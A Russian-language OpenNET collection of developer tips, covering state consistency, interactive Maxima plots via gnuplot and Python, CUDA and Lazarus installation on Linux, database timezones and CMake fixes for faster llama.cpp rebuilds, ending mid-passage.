The OpenNET Project: СОВЕТЫ (Краткие заметки, Tips) (базовая разбивка)

СОВЕТЫ (Краткие заметки, Tips) (базовая разбивка)

Программисту и web-разработчику

AI

C/C++, сборка, отладка

Perl

CGI

Regex (регулярные выражения)

Массивы и Хэши

Отладка программ на Perl

Переменные в Perl

Полезные подпрограммы на Perl

Обработка изображений на Perl

Подпрограммы для WEB

Работа с сетью и IP адресами на Perl

Работа со временем и датами

Работа с файлами

Работа с электронной почтой

Функции и модули в Perl

PHP

Regex (регулярные выражения)

Конструкции языка и функции

Серверная часть и интерпретатор

Shell

Готовые скрипты

SQL и базы данных

MySQL специфика

Оптимизация и администрирование MySQL

PostgreSQL специфика

PlPerl и PlSQL

Оптимизация и администрирование PostgreSQL

Web-технологии

CGI на Perl:

CSS и оформление с использованием стилей

HTML

JavaScript

Системы контроля версий и управления исходными текстами

Гарантия консистентности двух и более состояний Автор: johnthesmith [комментарии]

Статья
описывает проблему гарантии полноты и неизбыточности при последовательной установке двух состояний;
выдвигает гипотезу о невозможности разрешения проблемы без участия состояний (без идемпотентности состояний);
предлагает Общее решение. Задача
Поток T должен установить два состояния S1 и S2.
S1 и S2 возвращают синхронный ответ при успехе сохранения и не более.
Требуется гарантировать полноту и не избыточность установки состояний. Проблема
Поток Т выполняет запись в S1.
При провале поток Т возвращает отказ.
При успехе поток Т должен выполнить запись в S2.
Начиная с этого момента возникает проблема неопределенности при ошибке установки S2 или крахе потока Т, состояние S1 уже установлено, а S2 не установлено; однозначно не определен результат исполнения потока T; повторный вызов потока Т не разрешит ситуацию. Гипотеза Не существует решения при котором поток Т гарантирует полноту и неизбыточность установки двух состояний, при том что состояния возвращают исключительно синхронный ответ о результате сохранения. Никакие механизмы со стороны Т не могут разрешить указанную проблему без идемпотентности S1. Варианты решения
Состояние S1 должно быть идемпотентным например: защита от дублированного получения данных; возможность оповещения T по его инициативе о результатах сохранения.
T должен обладать возможностью повтора установки состояний при отказе. Общее решение гарантии консистентности состояний Ниже перечислены рассматриваемые виды состояний:
S - (simple state) простое состояние без поддержки транзакций и идемпотентности, например: внешние сервисы; базы без идемпотентных проверок, с триггерами или автокоммитом; журналирование.
I - (idempotent state) - состояние с поддержкой идемпотентности: базы данных; сервисы; файлы.
T - (transact state) - состояния, поддерживающие транзакционную целостность: базы данных TSQL. Возможные комбинации Далее приведены возможные комбинации последовательной установки состояний в синхронном потоке, гарантия итоговой консистентности для различных вариантов и последствия сбоя в потоке между установкой состояний. Обязательным условием является повтор вызова потока при отказе на любой стадии. Пример: Поток получает сообщение из очереди, которая гарантирует повторяемость. Вызов потока из UI не гарантирует повторяемость события, так как пользователь получив ошибку, может не выполнить повторное действие. SS
Гарантия консистентности: нет
Пример: Push сообщения в очередь; Write в журнал
Последствия: Накопление дублей сообщений в очереди SI
Гарантия консистентности: нет
Пример: Commit сообщения очереди; Идемпотентный вызов сервиса
Последствия: Отсутствие гарантии вызова сервиса ST
Гарантия консистентности: нет
Пример: Commit сообщения очереди; Insert в базу
Последствия: Накопление дублей сообщений в очереди IS
Гарантия консистентности: да
Пример: Insert с предпроверкой в базу; Commit сообщения очереди
Последствия: Многократные попытки Insert II
Гарантия консистентности: да
Пример: Insert с предпроверкой в базу; Update с предпроверкой в базу
Последствия: Многократные попытки Insert IT
Гарантия консистентности: да
Пример: Вызов внешнего сервиса; Запись в базу
Последствия: Многократный вызов внешнего сервиса TS
Гарантия консистентности: нет
Пример: Insert в базу; Push в очередь
Последствия: Накопление дублей в БД TI
Гарантия консистентности: нет
Пример: Insert в базу; Запись с предпроверкой в базу
Последствия: Накопление дублей в БД TT
Гарантия консистентности: да
Пример: Insert в базу; Запись в базу в одной транзакции
Последствия: Полный откат транзакции Общие правила гарантии сохранения состояний Повторяемость вызова при любом отказе в потоке И идемпотентность предыдущего изменения состояния ИЛИ изменение всех состояний в единой транзакции. Ccылки статья на github

Создание интерактивных графических моделей в CAS MAXIMA при использовании ОС GNU Linux Автор: NuINu [комментарии]

Предисловие. Не так давно я посмотрел фильм: Конрад Вольфрам. "Как учить детей настоящей математике с помощью компьютеров", в котором автор использовал некие программы для улучшения процесса обучения детей, представляющие собой математические модели, управляемые с помощью интерфейсных графических элементов, таких как кнопки, шкалы, меню. Я слышал, что подобные интерфейсные элементы встречаются в других математических пакетах и, естественно, знал, что в максиме ничего подобного нет, не считая, конечно, wxMaxima, которая является небольшой графической надстройкой над максимой, но и она не позволяет встраивать подобные элементы в расчетный документ, тем самым не позволяя создать математическую модель, управление расчетом в которой можно было бы производить с помощью графических интерфейсных элементов. Поэтому вопрос о создании интерактивных интерфейсов в максиме долгое время оставался для меня открытым и, не видя очевидных путей его решения, я решил поизучать, как работает графическая система отображения в Максиме. Предпосылки. В максиме имеются два основных способа отображения графической информации - это функции plot и draw, простейший график рисуется вызовом функции plot2d(x^2,[x,-9,9]);. Оба этих класса функций используют другой математический пакет - gnuplot, как раз и специализирующийся на построении и выводе графиков. Поэтому я занялся изучением возможностей данного пакета и, в процессе изучения документации, наткнулся на один очень интересный параметр, который сыграл ключевую роль в успешной реализации задуманного. При установке типа терминала в gnuplot, для типа терминала X11, допускается параметр window, описан он плохо, и для чего необходим можно было лишь догадываться, поэтому я провел эксперимент по изучению возможности использования этого параметра: было бы очень приятно если бы gnuplot мог выводить графики в любое окно, которое мы ему укажем. Для эксперимента я написал простейшую программу на питоне, в которой создавал фрейм заданного размера и пару кнопок. Идентификатор этого окна, а вернее - фрейма, очень легко узнать командой: xwininfo -tree Root window id: 0xbd (the root window) (has no name) Parent window id: 0x12559b9 (has no name) 1 child: 0x3c0000e (has no name): () 640x509+0+0 +2+80 3 children: 0x3c00012 (has no name): () 67x29+109+480 +111+560 0x3c00011 (has no name): () 109x29+0+480 +2+560 0x3c00010 (has no name): () 640x480+0+0 +2+80 Теперь запустим gnuplot и дадим там несколько команд: gnuplot> set terminal x11 window "3c00010" Terminal type set to 'x11' Options are 'XID 0x3C00010 nopersist' gnuplot> plot(sin(x)); вуаля!!! гнуплот рисует график функции в указанном окне, при этом все кнопки приложения работают . Вот так и выяснилось, что этот параметр является ключевым в возможности интеграции gnuplot в различные графические приложения в системе Xwindow. Реализация. Идея построения интерактивной графической параметрической модели родилась после этого эксперимента довольно быстро, суть ее состояла в том, что мы добавим в максиму функцию, позволяющую строить интерактивные графики, организованные по принципу Модель-Вид-Контроллер, в которой maxima будет отвечать за модель, gnuplot отвечать за вид, а управлять всем этим и реализовывать контроллер будет программа на питоне(замечу, выбор питона - это чисто мое предпочтение, контроллер можно организовать на любом, приятном для вас языке). Здесь я приведу окончательный и полный текст программы на максиме и опишу что делает каждая ее строчка, но для начала опишу, что нужно от пользователя, чтобы получить интерактивную графическую модель: во первых ее надо определить на языке максима, а так же указать параметры, их начальные значения и диапазон значений(не обязательно, но я не проверял, что будет, если это не сделать :-) ), а также указать, где в файловой системе находится вид-контроллер для данной модели. Создаем модель в максиме: к примеру это будет график функции n*sin(x) и график функции sin(b*x). Допустим, в нашей модели n*sin(x), n должен меняться от 0.1 до 10.0 с шагом 0.2, поскольку я намереваюсь управлять этим значением при помощи шкалы значений целых чисел, то в формулу надо внести изменения (a/10.)*sin(x), а диапазон значений, передаваемый в контроллер, будет от 1 до 100, с начальным значением 1 и шагом изменения 2(для демонстрации). Параметр b: начальное значение 1, диапазон от 1 до 12, и зададим параметр, меняющий диапазон расчета графиков от 2 до 5, с начальным значением 2 g1:explicit((a/10.)*sin(x),x,-c*%pi,c*%pi); g2:explicit(sin(b*x),x,-c*%pi,c*%pi); model:'draw2d(color=red,g1, color=blue,g2); param_set:[[a,1,"1:100:2"],[b,1,"1:12"],[c,2,"2:5"]]; name_model:sconcat(maxima_tempdir,"/work/maxima/gnuplot/mvc_3scale.py"); model - это наша параметризованная модель, param_set - это набор параметров с заданием начальных значений и диапазона возможных значений, name_model - это имя контроллера, который будет вызываться для отображения нашей модели вместо стандартной программы отображения графиков gnuplot. Всё, модель задана, осталось только запустить ее в обработку. Для обработки я выбрал имя функции idraw, в смысле интерактивное рисование. idraw(model,param_set,name_model); Итак, функция idraw: /* i -означает интерактивный */ idraw(model,param_set,name_model) := block( [old_plot_format,t1,pipe_view_name,pipe_view,plt_fmt,cmd,ll], pipe_view_inter_n:sconcat(maxima_tempdir, "/maxima.pipe_interact"), pipe_view_param_n:sconcat(maxima_tempdir, "/maxima.pipe_param"), /*подготовим канал для взаимодействия с процессом интерактивного представления модели вид-контроллер и канал для передачи параметров от модели в контроллер*/ if not probe_file(pipe_view_inter_n) then system(sconcat("mkfifo ", pipe_view_inter_n)), if not probe_file(pipe_view_param_n) then system(sconcat("mkfifo ", pipe_view_param_n)), /*запомним предыдущий способ отрисовки графиков и установим свой*/ old_plot:gnuplot_command, gnuplot_command:name_model, guplot_close(), /*надо обязательно закрыть предыдущую сессию gnuplot, иначе максима не вызовет новую модель*/ /*выполним отрисовку интерактивной модели с установками по умолчанию*/ t1:map(lambda([x],x[1]=x[2]),param_set), ev(model,nouns,t1), /*через канал передачи параметров максимы и интерактивного вида-контроллера настроим контроллер*/ /*с обратной стороны канала уже должен работать процесс, считывающий данные из него, костыль с |cat >file приделан т.к. максима почему-то не может открыть на запись файл fifo*/ pipe_view:openw(sconcat("| cat >",pipe_view_param_n)), /*в цикле передадим имеющиеся параметры*/ map(lambda([x],printf(pipe_view,"~a:~d:~a~%", x[1],x[2],x[3]),0),param_set), printf(pipe_view,"end~%"), close(pipe_view), /*теперь открываем на чтение канал интерактивной передачи параметров*/ kill(pipe_view), pipe_view:openr(pipe_view_inter_n), /*запускаем цикл чтения данных из канала управления моделью*/ cmd:1, while cmd=1 do block( if stringp(ll : readline(pipe_view)) then block ( print("read from pipe_view: ", ll), /*для отладки*/ /*вид приходящей строки (cmd:1,t1:[a = 1,b = 1,c = 2])*/ eval_string(ll), /*устанавливаем переменные t1,cmd*/ /*получая новые значения параметров, пересчитываем модель и перерисовываем view*/ if cmd=1 then ev(model,nouns,t1 ) ) else cmd:0 ), close(pipe_view), gnuplot_close(), gnuplot_command:old_plot ); view в gnuplot не нуждается в какой либо программе, это полностью управляемый элемент через stdin в который может писать команды и maxima и контроллер. Что же должен представлять собой контроллер? У нас это программа на питоне, которая с одной стороны должна принимать команды от максимы и передавать их в gnuplot, с другой - она должна передавать установленные в контроллере новые значения параметров обратно в максиму. Вкратце опишу, что в ней происходит: 0) Поскольку функция idraw заменила название основной утилиты для отрисовки графиков, то вместо gnuplot будет вызвана наша программа, так создается main_controller_process 1) create_Tk_interface() Создаем графический интерфейс, как-то фрейм в который будет выводить gnuplot построенные на основе данных из максимы, элементы управления - Scale, которые затем будут инициализироваться принятыми из максимы параметрами, и значения которых впоследствии будут передаваться обратно в максму, и пара кнопок(пересчитать и выход). 2)create_gnuplot_pipe() создаем процесс gnuplot и получаем два канала к нему для ввода и вывода данных. 3)change_terminal() поскольку интерфес Тк мы построили, гнуплот запустили, можем дать команду в гнуплот об установке типа терминала X11 и конкретного окна для вывода графиков. 4)make_process_reader() Запускаем дочерний питон процесс, который будет читать данные из stdin потока и передавать их в процесс gnuplot, таким образом обеспечиваем передачу данных из максимы в гнуплот. 5)open_pipe_param(read) открываем канал для чтения значений параметров из максимы 5.1) do_read_param() читаем построчно данные из максимы, разбираем ввод и формируем хеш массив param 6) do_set_widget_param() используя ранее полученные значения параметров, сохраненные в хеш массиве param 7) open_pipe_interact(write) открываем на запись канал для интерактивной передачи команд в максиму, где сейчас должна работать функция idraw, читающая и интерпретирующая эти команды. 8)do_main_Tkloop() запускаем цикл обработки сообщений Tk интерфейса В процессе работы Тк интерфейса могут происходить следующие события: 8.1) set_param() Пользователь установил новое значение параметра, это новое значение просто сохраняется в хеш массиве param 8.2) recalc() Пользователь нажал на кнопку "пересчитать", при этом все текущие значения, сохраненные в массиве param, оформляются в командную строку, которую способна интерпретировать максима и через канал передаются туда, в максиме, эти данные интерпретируются моделью, после чего сформированные команды для gnuplot передаются через процесс-посредник в gnuplot, таким образом, гнуплот выводит новое графическое представление модели, в соответствии с установленными значениями параметров. 8.3) quit() пользователь нажал на кнопку "выйти" или другим образом завершил работу контроллера, при этом в максиму передается команда, завершающая цикл чтения канала интерактивной передачи значений параметров, сигналом kill завершается работа процесса посредника child_reader_process, затем закрывается и сеанс gnuplot. На этом программа работы контроллера и завершается. Для лучшего понимания процесса взаимодействия всех участников данной системы, я нарисовал диаграмму взаимодействия процессов рис 1. Данной модели соответствует работа программ mvc_2edit_1scale.py и mvc_3scale.py, их я здесь приводить не буду, т.к. с ними вы сможете ознакомиться, изучив прилагаемы к этому документу файлы. Собираем все вместе: определяем модель в каком нибудь файле, например model2.mac содержащий: work_dir:sconcat(maxima_tempdir,"/work/maxima/gnuplot/"); /*загружаем функцию интерактивного рисования*/ load(sconcat(work_dir,"idraw")); /*описание модели*/ g1:implicit(a=x^2+y^2+z^2,x,-c,c,y,-c,c,z,-c,c); g2:explicit(sin(b*x)*sin(2*y),x,-2*c,2*c,y,-2*c,2*c); model:'draw3d(surface_hide=true,color=red,g1, color=blue,g2); param_set:[[a,1,"1:6:1"],[b,1,"1:12"],[c,1,"1:15"]]; name_model:sconcat(work_dir,"mvc_3scale.py"); корректируем файл контроллера или создаем новый, меняя состав виджетов и названия параметров, соответствующих нашей модели. Загружаем максиму, и даем команду: load(sconcat(maxima_tempdir,"/maxima/gnuplot/model3.mac")); и теперь выполняем отрисовку модели, и управление моделью через полученный интерфейс. idraw(model,param_set,name_model); Рисунок 1 В результате мы должны получить нечто подобное рис 2. Рисунок 2. Пример использующий контроллер mvc_2edit_1scale.py допускает изменение параметров с помощью полей ввода целых чисел и чисел с плавающей запятой (вернее точкой), но для того, чтобы он заработал, пришлось слегка изменить формат передачи параметров и начать указывать в них, какого типа значение будет принимать параметр. Пример создадим файл model2_1.mac work_dir:sconcat(maxima_tempdir,"/work/maxima/gnuplot/"); load(sconcat(work_dir,"idraw")); g1:explicit(a*sin(x),x,-c*%pi,c*%pi); g2:explicit(sin(b*x),x,-c*%pi,c*%pi); call_d:'draw2d(color=red,g1, color=blue,g2); model:call_d; param_set:[[a,55.0,"f:0.1:100.0"], [b,17,"i:1:100"], [c,2,"1:10"]]; name_model:sconcat(work_dir,"mvc_2edit_1scale.py"); в определении параметров добавили столбец, определяющий тип параметра int(i) или float(f). load(sconcat(maxima_tempdir,"/work/maxima/gnuplot/model2_1.mac")); и запустим интерпретацию нашей модели модели idraw(model,param_set,name_model); должны получить нечто подобное рис.3 Рисунок 3. Ну и в завершении я представлю программу mvc_any_param.py, которая идеально подойдет для людей, не желающих программировать для каждой модели еще и контроллер, она способна в минимальном представлении отрисовать любое передаваемое ей количество параметров любого типа. Для того, чтобы она работала, необходимо опять изменить формат передаваемых параметров, и для каждого параметра указывать, какого типа виджет мы желаем использовать для его редактирования. Добавим в начало каждой строки параметров, там где мы ранее задавали диапазон, еще одно поле со значениями s - Scale или e - Entry. Изучаем пример, файл model4.mac: work_dir:sconcat(maxima_tempdir,"/work/maxima/gnuplot/"); load(sconcat(work_dir,"idraw")); g1:explicit((a/10.)*sin(x),x,-c*%pi,c*%pi); g2:explicit(sin(b*x),x,-c*%pi,c*%pi); model:'draw2d(color=red,g1, color=blue,g2); param_set:[[a,55.0,"e:f:10.0:1000.0"], [b,17,"e:i:1:100"], [c,2,"s:1:10"]]; param_set1:[[a,55.0,"e:f:10.0:1000.0"], [b,17,"e:i:1:100"], [c,2,"s:1:10"], [da,55,"s:10:1000"], [bi,17,"e:f:1:100"], [ca,2,"s:0:20"]]; param_set2:[[a,55.0,"e:f:10.0:1000.0"], [b,17,"e:i:1:100"], [c,2,"s:1:10"], [da,55,"s:10:1000"], [bi,17,"e:f:1:100"], [ca,2,"s:0:20"], [w,55,"s:10:1000"], [bu,17,"e:f:1:100"]]; name_model:sconcat(work_dir,"mvc_any_param.py"); Загрузив нашу модель командой: load(sconcat(maxima_tempdir,"/work/maxima/gnuplot/model4.mac")); запустим интерпретацию нашей модели idraw(model,param_set2,name_model); Мы должны получить что то подобное рисунку 4 Я не стал изменять саму модель, просто продемонстрировал простоту добавления параметров. Рисунок 4. Заключение. Ну вот, собственно говоря, и все. В принципе, в программе можно еще много что делать и совершенствовать. Но, как говорится, лучшее враг хорошего, к нему можно бесконечно приближаться, а работу надо рано или поздно заканчивать. Удачи вам, удосужившимся ознакомиться с моим трудом, надеюсь знакомство с максимой, линуксом и питоном обогатят вашу жизнь, сделают шире ваши возможности, как это произошло со мной. Разработал Гагин Михаил ака NuINu c благодарностью к разработчикам Maxima, Gnuplot, Python, Linux и всему сообществу OpenSource. Примеры кода к статье и версию статьи в формате PDF можно загрузить здесь.

Установка NVIDIA CUDA в Ubuntu 9.10 (доп. ссылка 1) Автор: h1z [комментарии]

CUDA - это архитектура параллельных вычислений от NVIDIA, позволяющая существенно увеличить вычислительную производительность благодаря использованию GPU (графических процессоров). Итак, приступим к установке Nvidia CUDA Toolkit & SDK! Все действия проводятся в Ubuntu 9.10, хотя официально поддерживается только 9.04. Для начала, следует установить драйверы версии 190(.*). Их можно скачать со страницы загрузки cuda и установить в ручную, а можно добавить репозиторий с новыми драйверами: sudo add-apt-repository ppa:nvidia-vdpau/ppa # Добавляем репозиторий vdpau sudo apt-get update sudo apt-get install nvidia-glx-190 nvidia-190-modaliases nvidia-settings-190 Toolkit. После установки драйверов, приступим к установке Toolkit'a. На странице загрузки cuda, выберите и скачайте подходящий пакет CUDA Toolkit. Загрузка пакета для ubuntu 9.04 amd64 wget http://developer.download.nvidia.com/compute/cuda/2_3/toolkit/cudatoolkit_2.3_linux_64_ubuntu9.04.run Установка Toolkit'a sudo chmod +x ./cudatoolkit_2.3_linux_64_ubuntu9.04.run # Замените на свою версию sudo ./cudatoolkit_2.3_linux_64_ubuntu9.04.run SDK. Установка SDK для текущего пользователя wget http://developer.download.nvidia.com/compute/cuda/2_3/sdk/cudasdk_2.3_linux.run chmod +x ./cudasdk_2.3_linux.run ./cudasdk_2.3_linux.run Компиляция примеров: export PATH=$PATH:/usr/local/cuda/bin # Указываем путь к компилятору nvcc export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/cuda/lib # Для amd64 замените на lib64 echo 'export PATH=$PATH:/usr/local/cuda/bin' >> ~/.bashrc echo 'export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/cuda/lib' >> ~/.bashrc # Для amd64 замените на lib64 sudo nano /etc/ld.so.conf.d/cuda.conf > /usr/local/cuda/lib # Для amd64 замените на lib64 sudo ldconfig sudo apt-get install g++-4.3 freeglut3-dev libxi-dev libxmu-dev SDK поддерживает версию gcc 4.3, если использовать версию gcc 4.4, то при сборке возникнут ошибки Открыть <путь где установлен SDK>/common/common.mk и заменить строки > CXX := g++-4.3 > CC := gcc-4.3 > LINK := g++-4.3 -fPIC > NVCCFLAGS :=--compiler-bindir=/usr/bin/gcc-4.3 Компиляция make После компиляции, готовые примеры будут находится в папке <путь где установлен SDK>/C/bin/linux/release.

Настройка Nvidia CUDA 2.3 на Ubuntu 9.04 Автор: Юрий Иванов [комментарии]

Технология CUDA позволяет производить вычисления на видеокарте. Для некоторых задач скорость вычислений ускоряется в десятки раз. CUDA 2.3 официально поддерживает Ubuntu 9.04 . Но тем не менее есть ньюансы. Предлагаю ознакомиться с моим успешным опытом. 1. Для cuda 2.3 нужен 190й драйвер NVIDIA. Ставим драйвер как написано здесь http://www.ubuntugeek.com/install-nvidia-graphics-drivers-190-42-in-ubuntu-karmicjauntyintrepidhardy.html и перезагрузка. А именно так: откройте файл sudo gedit /etc/apt/sources.list и добавьте следующие строки: deb http://ppa.launchpad.net/nvidia-vdpau/ppa/ubuntu jaunty main deb-src http://ppa.launchpad.net/nvidia-vdpau/ppa/ubuntu jaunty main добавляем ключи sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys CEC06767 устанавливаем sudo apt-get install nvidia-190-modaliases nvidia-glx-190 nvidia-settings-190 перезагрузка 2. Ставим от рута cudatoolkit. Скачать ПО можно здесь: http://www.nvidia.ru/object/cuda_get_ru.html . Видеодрайвер не нужен - мы его поставили в предыдущем шаге. chmod 744 cudatoolkit_2.3_linux_32_ubuntu9.04.run cudasdk_2.3_linux.run sudo ./cudatoolkit_2.3_linux_32_ubuntu9.04.run 3. Ставим от пользователя cuda sdk ./cudasdk_2.3_linux.run 4.добавляем в ~/.bashrc строки #settings for cuda export PATH=/usr/local/cuda/bin:$PATH export LD_LIBRARY_PATH=/usr/local/cuda/lib:$LD_LIBRARY_PATH (для 64-битных систем в переменной LD_LIBRARY_PATH надо указывать на каталог /usr/local/cuda/lib64) и выполняем эти команды в терминале чтоб не перезагружаться. 5. Доустанавливаем пакеты и компилируем примеры sdk 5.1 Доустанавливаем пакеты: sudo apt-get install g++ freeglut3-dev libxi-dev libxmu-dev ставит еще кучу дополнительных пакетов. мы соглашаемся. 5.2 Компиляцию можно делать для всех программ и по одиночке. Пробуем cd ~/NVIDIA_GPU_Computing_SDK/C make откомпилированные бинарники находятся в ~/NVIDIA_GPU_Computing_SDK/C/bin/linux/release Можно примеры откомпилировать даже если на компьютере нет видеокарты поддерживающей CUDA. В этом случае задается параметр emu=1. Результат будет в папке ~/NVIDIA_GPU_Computing_SDK/C/bin/linux/emurelease make emu=1 6. Запускаем откомпилированные программы и радуемся. Проверкой является вывод программ deviceQuery и bandwidthTest. Вот вывод программ: ./deviceQuery CUDA Device Query (Runtime API) version (CUDART static linking) There is 1 device supporting CUDA Device 0: "GeForce GTX 260" CUDA Driver Version: 2.30 CUDA Runtime Version: 2.30 ... Test PASSED ./bandwidthTest Running on...... device 0:GeForce GTX 260 Quick Mode Host to Device Bandwidth for Pageable memory Transfer Size (Bytes) Bandwidth(MB/s) 33554432 3168.1 ... Test PASSED PS. После установки 190-го драйвера возникает какой-то конфликт с кодеками. Предлагают поставить 185й драйвер но тогда cuda работать не будет.

Delphi-подобная среда разработки в Linux на базе Lazarus и Indy 10 Автор: Romeo Ordos [комментарии]

Уже третий год программирую на Delphi и с переходом на Линукс очень огорчился, тем что здесь его поддержка довольно плохо реализована. Недавно наткнулся на интересный проект Free Pascal Compiler и IDE для него: Lazaros. Как настоящий дельфист решил испытать судьбу. Получилось довольно неплохо, и теперь я с уверенностью полностью погрузился в мир Linux. Все опыты проводил в дистрибутиве Debian (5.0 lenny). Изначально добавляем ключи подлинности репозитория: gpg --keyserver hkp://pgp.mit.edu:11371 --recv-keys 6A11800F gpg --export 6A11800F | sudo apt-key add - Добавляем сам репозиторий: echo "deb http://www.hu.freepascal.org/lazarus/ lazarus-testing universe" > /etc/apt/sources.list.d/lazarus.list apt-get update Устанавливаем Lazarus и fpc apt-get install lazarus Добавляем компоненты Indy: wget http://www.indyproject.org/Sockets/fpc/indy-10.2.0.1.tar.gz sudo cp ./indy-10.2.0.1.tar.gz /usr/share/lazarus/components/ sudo tar -xzf indy-10.2.0.1.tar.gz cd /usr/share/lazarus/components/indy-10.2.0.1 sudo mkdir saved sudo cp ./lazarus/* ./saved sudo cp -f ./fpc/* ./lazarus sudo cp -i ./saved/* ./lazarus # Всегда отвечаем n Теперь устанавливаем сам пакет Indy из самого Lazarus: Сервис>Преобразовать пакет Delphi в пакет Lazarus>/usr/share/lazarus/components/indy-10.2.0.1.lazarus/indy/laz.lpk Ждем долгую компиляцию пакета, после чего наслаждаемся всей функциональностью Delphi... Полезные ссылки: http://www.lazarus.freepascal.org/ http://www.freepascal.ru/ http://wiki.lazarus.freepascal.org/index.php/Indy_with_Lazarus

Изменение текущего часового пояса в MySQL, PostgreSQL и в скриптах [комментарии]

MySQL: Посмотреть список глобального и локального часового пояса: SHOW VARIABLES LIKE '%time_zone%'; Конвертация в запросе времени из одной временной зоны в другую: SELECT CONVERT_TZ('2008-10-24 5:00:00','UTC','MSK'); Изменить текущую зону для локального соединения: SET time_zone = 'MSK' или SET time_zone = '+03:00'; Для всего MySQL сервера часовой пояс можно поменять установив в файле конфигурации: default-time-zone='MSK' или под привилегированным пользователем выполнить запрос: SET GLOBAL time_zone ='MSK' PostgreSQL: Для текущей сессии зона задается через: SET TIME ZONE 'MSK' или SET TIME ZONE '-3' Для клиентов использующих libpq часовой пояс может быть определен в переменной окружения PGTZ. Если часовой пояс для всей СУБД не определен (параметр timezone) в postgresql.conf, он берется из стандартной переменной окружения TZ в shell: export TZ=GMT-3 в perl: $ENV{"TZ"}="GMT-3"; в PHP: putenv("TZ=GMT-3");

Как посмотреть полный список используемых программой библиотек и функций [обсудить]

Библиотеки: readelf -d программа |grep NEEDED Функции из библиотек: readelf -s программа

Как вернуть исходные тексты в состояние до наложения патча [обсудить]

bzcat patch.bz2| patch -R -p1 где, -R - реверсное наложение патча (возвращает в исходное до патча состояние), -p1 - уровень очистки начального пути (если путь в патче "diff -ruN path1/path2/file.c", то -p1 вырезает path1/, -p2 - path1/path2/)

Ускорение пересборки llama.cpp (доп. ссылка 1) Автор: Аноним [комментарии]

При работе с llama.cpp имеется постоянная необходимость её пересобирать, так как в отличие от ONNX Runtime GGUF-файлы не хранят сериализованный граф вычислений, вместо этого процедура инференса вручную кодится в C++-коде, и за счёт применения информации, которую в ONNX обычно не сериализуют (ONNX обычно экспортируется автоматически, но знания можно туда встроить, если закодировать конструирование ONNX-графа вручную), может быть достигнута большая эффективность (по потреблению ресурсов) инференса. Это приводит к тому, что для того, чтобы исполнять модель на llama.cpp необходимы усилия программистов. В большинстве случаев каждая новая модель обладает уникальной архитектурой, и в большинстве случаев её поддержка кодится в проект сотрудниками компании-разработчика самой модели, если компания нуждается в продвижении своих моделей (зачастую такие модели распространяются под проприетарной лицензией, запрещающей коммерческое использование без заключения договора, при этом они закрывают некоторые потребности тех, кому нужен экономичный к ресурсам инференс). Так как структура проекта не подразумевает динамической загрузки отдельно собираемой разделяемой библиотеки с архитектурой модели, то при добавлении моделей или возможностей приходится пересобирать весь проект. Это обосновано, так как архитектура проекта и его API не являются стабильными и код одной реализации модели переиспользуется в другой. Однако проект имеет некоторые проблемы. Которые, впрочем, "никому" "не мешают", так как нейросети (стереотипно "тяжёлое" приложение, не смотря на то, что существуют мелкие нейросети размером в несколько мебибайт) запускать на "калькуляторе", "обогревателе" и "музейном хламе со свалки" никто "в здравом уме" (со слов "здравомыслящих") не будет. Проблемы заключаются в том, что проект долго компилируется и долго линкуется, и при этом имеет тенденцию требовать пересборки и перелинковки при малейших вроде-бы безобидных изменениях, вроде изменения переменной "CMAKE_INSTALL_LIBDIR". Я проанализировал и исправил некоторые, но не все, причины подобного поведения. Причины заключаются в том, что в проекте использованы приёмы, являющиеся антипаттернами, которые было бы неплохо разобрать, чтобы вы так не делали. 1. Проект полагается на пару больших заголовочных файлов. Почти любое функциональное изменение требует модификации этих заголовочных, а любая их модификация приводит к полной перекомпиляции проекта. Это не то, что мы можем поправить парой патчей, это требует изменений в процессах. 2. Проект имеет в нескольких местах "add_library(${TARGET} STATIC". Это приводит к тому, что некоторые куски кода линкуются статически в некоторые другие куски кода. Это, конечно, должно приводить к более быстрому коду при линковке с LTO, но линковка с LTO тот ещё тормоз, а инструментов в проекте мнооогооо, и никто и не задавался вопросом, нужна ли конкретно вон там максимальная производительность, достигаемая инлайном и стиранием границы между модулями, или всё же heavy lifting у нас делает GGML, и основная часть вычислений жрётся инференсом, а оптимизация консольной обёртки вокруг GGML даст очень немного. При этом хардкод STATIC а равно SHARED является антипаттерном, так как в проектах на CMake это решение принимается теми людьми, кто исходник собирает в бинарники, и выставляется через стандартную переменную CMake "BUILD_SHARED_LIBS". Поэтому целесообразно там стереть STATIC, и при "set(BUILD_SHARED_LIBS ON)" это нам срежет время линковки. Поскольку библтотеки теперь могут быть SHARED, добавляем их установку (патч). 3. В проекте присутствует код cmake target_compile_definitions(ggml-base PRIVATE GGML_VERSION="${GGML_INSTALL_VERSION}" GGML_COMMIT="${GGML_BUILD_COMMIT}" ) При этом "GGML_BUILD_COMMIT" и "GGML_INSTALL_VERSION" динамически генерятся при запуске CMake. "ninja" автоматически определяет, какие объектные файлы нуждаются в перекомпиляции, и изменение аргументов вызова компилятора - это показание к перекомпиляции. Что приводит к тому, что при любом коммите "ggml-base" пересобирается полностью, а линкующие его бинари - перелинковываются, а от "ggml-base" транзитивно зависит почти весь проект. Указанные макроопределения используются ровно в одних местах - в реализациях методов, возвращающих указанные значения, дальнейший доступ к этим значениям идёт исключительно через методы. Имеет смысл вынести указанные методы в отдельную библиотеку. Линковать я её бы, разумеется, предпочёл бы в соответствии с "BUILD_SHARED_LIBS", но так как смысл этих методов - быть прибитыми к файлу библиотеки ggml-base гвоздями, то вот тут как раз хардкодим "STATIC" (патч). 4. В проекте присутствует cmake () target_compile_definitions(ggml PUBLIC GGML_BACKEND_DIR="${GGML_BACKEND_DIR}") , при этом макроопределение "GGML_BACKEND_DIR" за пределами библиотеки "ggml" не используется. Использование "PUBLIC" приводит к тому, что все бинари, которые линкуют "ggml", получат в командной строке вызова своего компилятора это определение. Соответственно, если вы потрогаете эту переменную, то это приведёт к почти полной перекомпиляции проекта. При этом это макроопределение используется в коде ровно в одном месте: "search_paths.push_back(fs::u8path(GGML_BACKEND_DIR));", и поэтому "PUBLIC" нужно смело менять на "PRIVATE". По-хорошему путь вообще не должен хардкодиться, а должен определяться относительно бинарей. В проекте используется поиск в директории бинарей, но путь относительно неё не конфигурируется, а задание "GGML_BACKEND_DIR" используется для того, чтобы shared-библиотеки бэкендов легли не в "/usr/bin". Подход в некоторой степени странный. Логичнее сделать конфигурируемым путь относительно директории бинарника, тогда при изменении префикса пересобирать библиотеку не придётся, ибо относительный путь останется тем же (патч). 5. В директории "common" в "CMakeLists.txt" есть кусочек cmake set(TEMPLATE_FILE 